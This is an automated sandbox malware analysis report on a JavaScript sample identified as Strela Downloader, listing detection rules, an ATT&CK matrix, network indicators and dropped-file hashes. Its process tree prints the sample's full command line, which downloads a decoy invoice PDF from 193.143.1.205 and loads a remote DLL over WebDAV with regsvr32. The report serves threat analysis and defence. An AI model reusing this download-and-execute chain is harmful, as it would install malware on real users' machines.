Windows
Analysis Report
28152172202187913252.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7796 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\28152 1722021879 13252.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7892 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\293 9088722913 .dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7944 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 8120 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 6328 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7612 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 08 --field -trial-han dle=1772,i ,338493559 7941311257 ,585720949 4249340201 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 1256 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587699 |
Start date and time: | 2025-01-10 17:06:24 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 59s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 28152172202187913252.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 2.23.242.162, 50.16.47.176, 34.237.241.83, 18.213.11.84, 54.224.241.105, 23.209.209.135, 2.22.50.131, 2.22.50.144, 2.16.168.105, 2.16.168.107, 23.204.152.210, 23.204.152.213, 192.168.2.10, 13.107.246.45, 172.202.163.200, 23.41.168.139, 4.245.163.56
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
11:07:21 | API Interceptor | |
11:07:25 | API Interceptor | |
11:07:25 | API Interceptor | |
11:07:34 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.8807503352820567 |
Encrypted: | false |
SSDEEP: | 1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9G:0J7adfWuK0p/QDfKoPeuP0aN4fqox9 |
MD5: | 3C362AD6F4F0A17F37DFD4E0863277A3 |
SHA1: | 4DB04E062A531487978C6A46267212F8C24AECA0 |
SHA-256: | E02336CA42A927D2827752DE7822A62D433B601DA9C12D9466B8EA28FC961DD3 |
SHA-512: | C922CD97F394434298ED09FA5D28C15DEE04AA1E364BA3A30AA2FAF4AFB95E4A13E8917195EB3C0FFBBFF14FFD5B3A506B87D2B3C2A003AE0541BC0BFD958834 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7879994722936989 |
Encrypted: | false |
SSDEEP: | 1536:3SB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:3azaPv4V4fXq2UaB |
MD5: | 7A19FE5C5B511F7C0F2F67DF02594F64 |
SHA1: | 66FE92E43B513C4C5067DDECD8BA33A7B81D4F46 |
SHA-256: | 12E8D56ADD7774F5E7D8376EDF4612B1AF8AE493F32B96DE263ED0343E68CF69 |
SHA-512: | E8554E3EF1B2FF00AE822F6DCE8A45277F3E40095040D26081AD781CDAF079B211986982670F2D38557A9E05E6549B35D1898F472F8A02E916B3640CAD923E21 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07933359893675479 |
Encrypted: | false |
SSDEEP: | 3:ofc/KYeIok1kiemXlVG0+q2Iqe8lSAq1vRYt/AllNTt/4ll/Q6beV/:o0/Kzt+k9UGE8lSK1AHtc6V |
